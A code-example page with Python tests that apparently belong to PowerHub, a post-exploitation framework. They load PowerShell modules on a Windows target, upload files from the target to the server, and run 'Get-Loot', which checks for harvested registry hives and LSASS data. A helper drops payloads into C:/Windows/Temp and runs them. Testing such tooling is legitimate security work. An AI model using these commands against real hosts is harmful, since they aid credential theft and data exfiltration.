Ejemplo n.º 1
0
def test_load_hubmodule(backend):
    out = execute_cmd(backend("lhm psmod53|fl;Invoke-Testfunc53"))
    assert "Test53" in out
    assert "psmod53" in out
    assert re.search("Name *: .*psmod53.ps1\r\n", out)
    assert re.search("Type *: ps1\r\n", out)
    assert re.search("N *: 72\r\n", out)
    assert re.search("Loaded *: True\r\n", out)
Ejemplo n.º 2
0
def test_load_hubmodule_range(backend):
    out = execute_cmd(
        backend('$p="72-74,77";lhm $p;Invoke-Testfunc53;' +
                "Invoke-Testfunc99;Invoke-Testfunc47;Invoke-Testfunc72;"))
    # I don't understand the order of the modules
    assert "Test53" in out
    assert "Test99" in out
    assert "Test47" in out
    assert "Test72" in out
Ejemplo n.º 3
0
def copy_and_execute(filename, payload, interpreter=""):
    import tempfile
    import subprocess
    if isinstance(payload, str):
        tmpf = tempfile.NamedTemporaryFile('w', delete=False)
    else:
        tmpf = tempfile.NamedTemporaryFile('wb', delete=False)
    tmpf.write(payload)
    tmpf.close()

    try:
        execute_cmd(f"ssh win10 del C:/Windows/Temp/{filename}")
    except subprocess.CalledProcessError:
        # this happens if the file does not exist
        pass

    execute_cmd(f"scp {tmpf.name} win10:C:/Windows/Temp/{filename}")
    out = execute_cmd(f"ssh win10 {interpreter} C:/Windows/Temp/{filename}")
    return out
Ejemplo n.º 4
0
def test_upload(backend):
    from powerhub.directories import UPLOAD_DIR
    testfile = "testfile-%030x.dat" % random.randrange(16**30)
    out = execute_cmd(
        backend(('$p=Join-Path $env:TEMP "%s";' +
                 '[io.file]::WriteAllBytes($p,(1..255));' + 'pth $p;rm $p') %
                testfile))
    time.sleep(1)
    assert "At line:" not in out  # "At line:" means PS error
    with open(os.path.join(UPLOAD_DIR, testfile), "rb") as f:
        data = f.read()
    assert data == bytes(range(1, 256))

    out = execute_cmd(backend('$p="FooBar123";$p|pth -name %s;' % testfile))
    time.sleep(1)
    assert "At line:" not in out  # "At line:" means PS error
    with open(os.path.join(UPLOAD_DIR, testfile + ".1"), "rb") as f:
        data = f.read()
    assert data == b"FooBar123"
Ejemplo n.º 5
0
def test_get_loot(backend):
    from powerhub import sql
    loot_count = len(sql.get_loot())
    out = execute_cmd(backend('Get-Loot'))
    assert "At line:" not in out  # "At line:" means PS error
    #  for i in range(60):
    #      time.sleep(1)
    #      loot = sql.get_loot()
    #      if (loot and loot[0].lsass and loot[0].hive and loot[0].sysinfo):
    #          break
    #  assert i < 59
    loot = sql.get_loot()
    assert loot_count + 1 == len(loot)
    loot = loot[-1]
    assert "Administrator" in loot.hive
    assert "500" in loot.hive
    assert "Microsoft Windows" in loot.sysinfo
    assert "isadmin" in loot.sysinfo
    assert "session_id" in loot.lsass
Ejemplo n.º 6
0
def test_list_hubmodules(backend):
    out = execute_cmd(backend("lshm"))
    for i in range(MAX_TEST_MODULE_PS1):
        assert "psmod%d" % i in out
Ejemplo n.º 7
0
def test_start(backend):
    out = execute_cmd(backend(""))
    assert "Adrian Vollmer" in out
    assert "Run 'Help-PowerHub' for help" in out